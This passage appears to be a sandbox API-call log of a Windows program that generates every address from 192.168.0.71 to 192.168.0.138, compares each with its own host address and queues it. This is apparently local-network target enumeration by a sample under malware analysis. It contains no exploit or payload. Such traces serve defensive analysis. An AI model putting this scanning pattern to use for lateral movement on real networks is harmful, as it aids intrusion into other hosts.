param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.71") returned 12 [0089.899] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.71") returned -1 [0089.900] malloc (_Size=0x1c) returned 0x20727f8 [0089.900] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20727f8 | out: ListHead=0x1fa03e8, ListEntry=0x20727f8) returned 0x20727d0 [0089.900] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.72") returned 12 [0089.900] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.72") returned -1 [0089.900] malloc (_Size=0x1c) returned 0x2072820 [0089.900] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072820 | out: ListHead=0x1fa03e8, ListEntry=0x2072820) returned 0x20727f8 [0089.900] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.73") returned 12 [0089.900] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.73") returned -1 [0089.900] malloc (_Size=0x1c) returned 0x2072848 [0089.900] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072848 | out: ListHead=0x1fa03e8, ListEntry=0x2072848) returned 0x2072820 [0089.900] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.74") returned 12 [0089.900] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.74") returned -1 [0089.900] malloc (_Size=0x1c) returned 0x2072870 [0089.900] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072870 | out: ListHead=0x1fa03e8, ListEntry=0x2072870) returned 0x2072848 [0089.900] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.75") returned 12 [0089.900] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.75") returned -1 [0089.900] malloc (_Size=0x1c) returned 0x2072898 [0089.900] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072898 | out: ListHead=0x1fa03e8, ListEntry=0x2072898) returned 0x2072870 [0089.900] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.76") returned 12 [0089.900] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.76") returned -1 [0089.900] malloc (_Size=0x1c) returned 0x20728c0 [0089.900] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20728c0 | out: ListHead=0x1fa03e8, ListEntry=0x20728c0) returned 0x2072898 [0089.900] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.77") returned 12 [0089.900] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.77") returned -1 [0089.900] malloc (_Size=0x1c) returned 0x20728e8 [0089.900] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20728e8 | out: ListHead=0x1fa03e8, ListEntry=0x20728e8) returned 0x20728c0 [0089.901] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.78") returned 12 [0089.901] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.78") returned -1 [0089.901] malloc (_Size=0x1c) returned 0x2072910 [0089.901] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072910 | out: ListHead=0x1fa03e8, ListEntry=0x2072910) returned 0x20728e8 [0089.901] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.79") returned 12 [0089.901] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.79") returned -1 [0089.901] malloc (_Size=0x1c) returned 0x2072938 [0089.901] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072938 | out: ListHead=0x1fa03e8, ListEntry=0x2072938) returned 0x2072910 [0089.901] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.80") returned 12 [0089.901] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.80") returned -1 [0089.901] malloc (_Size=0x1c) returned 0x2072960 [0089.901] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072960 | out: ListHead=0x1fa03e8, ListEntry=0x2072960) returned 0x2072938 [0089.901] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.81") returned 12 [0089.901] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.81") returned -1 [0089.901] malloc (_Size=0x1c) returned 0x2072988 [0089.901] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072988 | out: ListHead=0x1fa03e8, ListEntry=0x2072988) returned 0x2072960 [0089.901] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.82") returned 12 [0089.901] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.82") returned -1 [0089.901] malloc (_Size=0x1c) returned 0x20729b0 [0089.901] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20729b0 | out: ListHead=0x1fa03e8, ListEntry=0x20729b0) returned 0x2072988 [0089.901] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.83") returned 12 [0089.901] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.83") returned -1 [0089.901] malloc (_Size=0x1c) returned 0x20729d8 [0089.901] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20729d8 | out: ListHead=0x1fa03e8, ListEntry=0x20729d8) returned 0x20729b0 [0089.901] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.84") returned 12 [0089.901] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.84") returned -1 [0089.901] malloc (_Size=0x1c) returned 0x2072a00 [0089.902] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072a00 | out: ListHead=0x1fa03e8, ListEntry=0x2072a00) returned 0x20729d8 [0089.902] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.85") returned 12 [0089.902] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.85") returned -1 [0089.902] malloc (_Size=0x1c) returned 0x2072a28 [0089.902] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072a28 | out: ListHead=0x1fa03e8, ListEntry=0x2072a28) returned 0x2072a00 [0089.902] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.86") returned 12 [0089.902] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.86") returned -1 [0089.902] malloc (_Size=0x1c) returned 0x2072a50 [0089.902] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072a50 | out: ListHead=0x1fa03e8, ListEntry=0x2072a50) returned 0x2072a28 [0089.902] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.87") returned 12 [0089.902] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.87") returned -1 [0089.902] malloc (_Size=0x1c) returned 0x2072a78 [0089.902] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072a78 | out: ListHead=0x1fa03e8, ListEntry=0x2072a78) returned 0x2072a50 [0089.902] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.88") returned 12 [0089.902] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.88") returned -1 [0089.902] malloc (_Size=0x1c) returned 0x2072aa0 [0089.902] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072aa0 | out: ListHead=0x1fa03e8, ListEntry=0x2072aa0) returned 0x2072a78 [0089.902] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.89") returned 12 [0089.902] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.89") returned -1 [0089.902] malloc (_Size=0x1c) returned 0x2072ac8 [0089.902] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072ac8 | out: ListHead=0x1fa03e8, ListEntry=0x2072ac8) returned 0x2072aa0 [0089.902] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.90") returned 12 [0089.902] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.90") returned -1 [0089.902] malloc (_Size=0x1c) returned 0x2072af0 [0089.902] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072af0 | out: ListHead=0x1fa03e8, ListEntry=0x2072af0) returned 0x2072ac8 [0089.902] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.91") returned 12 [0089.902] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.91") returned -1 [0089.903] malloc (_Size=0x1c) returned 0x2072b18 [0089.903] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072b18 | out: ListHead=0x1fa03e8, ListEntry=0x2072b18) returned 0x2072af0 [0089.903] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.92") returned 12 [0089.903] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.92") returned -1 [0089.903] malloc (_Size=0x1c) returned 0x2072b40 [0089.903] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072b40 | out: ListHead=0x1fa03e8, ListEntry=0x2072b40) returned 0x2072b18 [0089.903] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.93") returned 12 [0089.903] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.93") returned -1 [0089.903] malloc (_Size=0x1c) returned 0x2072b68 [0089.903] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072b68 | out: ListHead=0x1fa03e8, ListEntry=0x2072b68) returned 0x2072b40 [0089.903] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.94") returned 12 [0089.903] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.94") returned -1 [0089.903] malloc (_Size=0x1c) returned 0x2072b90 [0089.903] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072b90 | out: ListHead=0x1fa03e8, ListEntry=0x2072b90) returned 0x2072b68 [0089.903] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.95") returned 12 [0089.903] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.95") returned -1 [0089.903] malloc (_Size=0x1c) returned 0x2072bb8 [0089.903] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072bb8 | out: ListHead=0x1fa03e8, ListEntry=0x2072bb8) returned 0x2072b90 [0089.903] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.96") returned 12 [0089.903] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.96") returned -1 [0089.903] malloc (_Size=0x1c) returned 0x2072be0 [0089.903] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072be0 | out: ListHead=0x1fa03e8, ListEntry=0x2072be0) returned 0x2072bb8 [0089.903] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.97") returned 12 [0089.903] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.97") returned -1 [0089.903] malloc (_Size=0x1c) returned 0x2072c08 [0089.903] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072c08 | out: ListHead=0x1fa03e8, ListEntry=0x2072c08) returned 0x2072be0 [0089.904] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.98") returned 12 [0089.904] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.98") returned -1 [0089.904] malloc (_Size=0x1c) returned 0x2072c30 [0089.904] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072c30 | out: ListHead=0x1fa03e8, ListEntry=0x2072c30) returned 0x2072c08 [0089.904] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.99") returned 12 [0089.904] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.99") returned -1 [0089.904] malloc (_Size=0x1c) returned 0x2072c58 [0089.904] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072c58 | out: ListHead=0x1fa03e8, ListEntry=0x2072c58) returned 0x2072c30 [0089.904] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.100") returned 13 [0089.904] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.100") returned 1 [0089.904] malloc (_Size=0x1c) returned 0x2072c80 [0089.904] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072c80 | out: ListHead=0x1fa03e8, ListEntry=0x2072c80) returned 0x2072c58 [0089.904] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.101") returned 13 [0089.904] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.101") returned 1 [0089.904] malloc (_Size=0x1c) returned 0x2072ca8 [0089.904] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072ca8 | out: ListHead=0x1fa03e8, ListEntry=0x2072ca8) returned 0x2072c80 [0089.904] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.102") returned 13 [0089.904] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.102") returned 1 [0089.904] malloc (_Size=0x1c) returned 0x2072cd0 [0089.904] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072cd0 | out: ListHead=0x1fa03e8, ListEntry=0x2072cd0) returned 0x2072ca8 [0089.904] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.103") returned 13 [0089.904] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.103") returned 1 [0089.904] malloc (_Size=0x1c) returned 0x2072cf8 [0089.904] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072cf8 | out: ListHead=0x1fa03e8, ListEntry=0x2072cf8) returned 0x2072cd0 [0089.904] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.104") returned 13 [0089.904] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.104") returned 1 [0089.904] malloc (_Size=0x1c) returned 0x2072d20 [0089.905] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072d20 | out: ListHead=0x1fa03e8, ListEntry=0x2072d20) returned 0x2072cf8 [0089.905] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.105") returned 13 [0089.905] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.105") returned 1 [0089.905] malloc (_Size=0x1c) returned 0x2072d48 [0089.905] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072d48 | out: ListHead=0x1fa03e8, ListEntry=0x2072d48) returned 0x2072d20 [0089.905] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.106") returned 13 [0089.905] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.106") returned 1 [0089.905] malloc (_Size=0x1c) returned 0x2072d70 [0089.905] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072d70 | out: ListHead=0x1fa03e8, ListEntry=0x2072d70) returned 0x2072d48 [0089.905] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.107") returned 13 [0089.905] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.107") returned 1 [0089.905] malloc (_Size=0x1c) returned 0x2072d98 [0089.905] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072d98 | out: ListHead=0x1fa03e8, ListEntry=0x2072d98) returned 0x2072d70 [0089.905] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.108") returned 13 [0089.905] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.108") returned 1 [0089.905] malloc (_Size=0x1c) returned 0x2072dc0 [0089.905] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072dc0 | out: ListHead=0x1fa03e8, ListEntry=0x2072dc0) returned 0x2072d98 [0089.905] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.109") returned 13 [0089.905] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.109") returned 1 [0089.905] malloc (_Size=0x1c) returned 0x2072de8 [0089.905] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072de8 | out: ListHead=0x1fa03e8, ListEntry=0x2072de8) returned 0x2072dc0 [0089.905] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.110") returned 13 [0089.905] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.110") returned 1 [0089.906] malloc (_Size=0x1c) returned 0x2072e10 [0089.906] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072e10 | out: ListHead=0x1fa03e8, ListEntry=0x2072e10) returned 0x2072de8 [0089.906] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.111") returned 13 [0089.906] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.111") returned 1 [0089.906] malloc (_Size=0x1c) returned 0x2072e38 [0089.906] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072e38 | out: ListHead=0x1fa03e8, ListEntry=0x2072e38) returned 0x2072e10 [0089.906] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.112") returned 13 [0089.906] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.112") returned 1 [0089.906] malloc (_Size=0x1c) returned 0x2072e60 [0089.906] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072e60 | out: ListHead=0x1fa03e8, ListEntry=0x2072e60) returned 0x2072e38 [0089.906] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.113") returned 13 [0089.906] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.113") returned 1 [0089.906] malloc (_Size=0x1c) returned 0x2072e88 [0089.906] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072e88 | out: ListHead=0x1fa03e8, ListEntry=0x2072e88) returned 0x2072e60 [0089.906] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.114") returned 13 [0089.906] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.114") returned 1 [0089.906] malloc (_Size=0x1c) returned 0x2072eb0 [0089.906] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072eb0 | out: ListHead=0x1fa03e8, ListEntry=0x2072eb0) returned 0x2072e88 [0089.906] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.115") returned 13 [0089.906] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.115") returned 1 [0089.906] malloc (_Size=0x1c) returned 0x2072ed8 [0089.907] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072ed8 | out: ListHead=0x1fa03e8, ListEntry=0x2072ed8) returned 0x2072eb0 [0089.907] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.116") returned 13 [0089.907] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.116") returned 1 [0089.907] malloc (_Size=0x1c) returned 0x2072f00 [0089.907] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072f00 | out: ListHead=0x1fa03e8, ListEntry=0x2072f00) returned 0x2072ed8 [0089.907] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.117") returned 13 [0089.907] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.117") returned 1 [0089.907] malloc (_Size=0x1c) returned 0x2072f58 [0089.907] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072f58 | out: ListHead=0x1fa03e8, ListEntry=0x2072f58) returned 0x2072f00 [0089.907] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.118") returned 13 [0089.907] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.118") returned 1 [0089.907] malloc (_Size=0x1c) returned 0x2072f80 [0089.907] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072f80 | out: ListHead=0x1fa03e8, ListEntry=0x2072f80) returned 0x2072f58 [0089.907] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.119") returned 13 [0089.907] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.119") returned 1 [0089.907] malloc (_Size=0x1c) returned 0x2072fa8 [0089.907] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072fa8 | out: ListHead=0x1fa03e8, ListEntry=0x2072fa8) returned 0x2072f80 [0089.907] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.120") returned 13 [0089.907] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.120") returned 1 [0089.907] malloc (_Size=0x1c) returned 0x2072fd0 [0089.907] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072fd0 | out: ListHead=0x1fa03e8, ListEntry=0x2072fd0) returned 0x2072fa8 [0089.907] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.121") returned 13 [0089.907] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.121") returned 1 [0089.907] malloc (_Size=0x1c) returned 0x2072ff8 [0089.907] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2072ff8 | out: ListHead=0x1fa03e8, ListEntry=0x2072ff8) returned 0x2072fd0 [0089.907] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.122") returned 13 [0089.908] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.122") returned 1 [0089.908] malloc (_Size=0x1c) returned 0x2073020 [0089.908] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073020 | out: ListHead=0x1fa03e8, ListEntry=0x2073020) returned 0x2072ff8 [0089.908] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.123") returned 13 [0089.908] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.123") returned 1 [0089.908] malloc (_Size=0x1c) returned 0x2073048 [0089.908] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073048 | out: ListHead=0x1fa03e8, ListEntry=0x2073048) returned 0x2073020 [0089.908] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.124") returned 13 [0089.908] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.124") returned 1 [0089.908] malloc (_Size=0x1c) returned 0x2073070 [0089.908] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073070 | out: ListHead=0x1fa03e8, ListEntry=0x2073070) returned 0x2073048 [0089.908] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.125") returned 13 [0089.908] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.125") returned 1 [0089.908] malloc (_Size=0x1c) returned 0x2073098 [0089.908] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073098 | out: ListHead=0x1fa03e8, ListEntry=0x2073098) returned 0x2073070 [0089.908] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.126") returned 13 [0089.908] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.126") returned 1 [0089.908] malloc (_Size=0x1c) returned 0x20730c0 [0089.908] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20730c0 | out: ListHead=0x1fa03e8, ListEntry=0x20730c0) returned 0x2073098 [0089.908] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.127") returned 13 [0089.909] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.127") returned 1 [0089.909] malloc (_Size=0x1c) returned 0x20730e8 [0089.909] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20730e8 | out: ListHead=0x1fa03e8, ListEntry=0x20730e8) returned 0x20730c0 [0089.909] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.128") returned 13 [0089.909] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.128") returned 1 [0089.909] malloc (_Size=0x1c) returned 0x2073110 [0089.909] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073110 | out: ListHead=0x1fa03e8, ListEntry=0x2073110) returned 0x20730e8 [0089.909] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.129") returned 13 [0089.909] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.129") returned 1 [0089.909] malloc (_Size=0x1c) returned 0x2073138 [0089.909] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073138 | out: ListHead=0x1fa03e8, ListEntry=0x2073138) returned 0x2073110 [0089.909] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.130") returned 13 [0089.909] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.130") returned 1 [0089.909] malloc (_Size=0x1c) returned 0x2073160 [0089.909] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073160 | out: ListHead=0x1fa03e8, ListEntry=0x2073160) returned 0x2073138 [0089.909] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.131") returned 13 [0089.909] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.131") returned 1 [0089.910] malloc (_Size=0x1c) returned 0x2073188 [0089.910] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073188 | out: ListHead=0x1fa03e8, ListEntry=0x2073188) returned 0x2073160 [0089.910] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.132") returned 13 [0089.910] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.132") returned 1 [0089.910] malloc (_Size=0x1c) returned 0x20731b0 [0089.910] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20731b0 | out: ListHead=0x1fa03e8, ListEntry=0x20731b0) returned 0x2073188 [0089.910] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.133") returned 13 [0089.910] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.133") returned 1 [0089.910] malloc (_Size=0x1c) returned 0x20731d8 [0089.910] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x20731d8 | out: ListHead=0x1fa03e8, ListEntry=0x20731d8) returned 0x20731b0 [0089.910] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.134") returned 13 [0089.910] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.134") returned 1 [0089.910] malloc (_Size=0x1c) returned 0x2073200 [0089.910] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073200 | out: ListHead=0x1fa03e8, ListEntry=0x2073200) returned 0x20731d8 [0089.910] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.135") returned 13 [0089.910] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.135") returned 1 [0089.910] malloc (_Size=0x1c) returned 0x2073228 [0089.910] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073228 | out: ListHead=0x1fa03e8, ListEntry=0x2073228) returned 0x2073200 [0089.910] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.136") returned 13 [0089.910] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.136") returned 1 [0089.910] malloc (_Size=0x1c) returned 0x2073250 [0089.910] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073250 | out: ListHead=0x1fa03e8, ListEntry=0x2073250) returned 0x2073228 [0089.910] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.137") returned 13 [0089.910] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.137") returned 1 [0089.910] malloc (_Size=0x1c) returned 0x2073278 [0089.910] RtlInterlockedPushEntrySList (in: ListHead=0x1fa03e8, ListEntry=0x2073278 | out: ListHead=0x1fa03e8, ListEntry=0x2073278) returned 0x2073250 [0089.910] wsprintfA (in: param_1=0x39af9b0, param_2="%s.%d" | out: param_1="192.168.0.138") returned 13 [0089.911] lstrcmpiA (lpString1="192.168.0.145", lpString2="192.168.0.138") returned 1 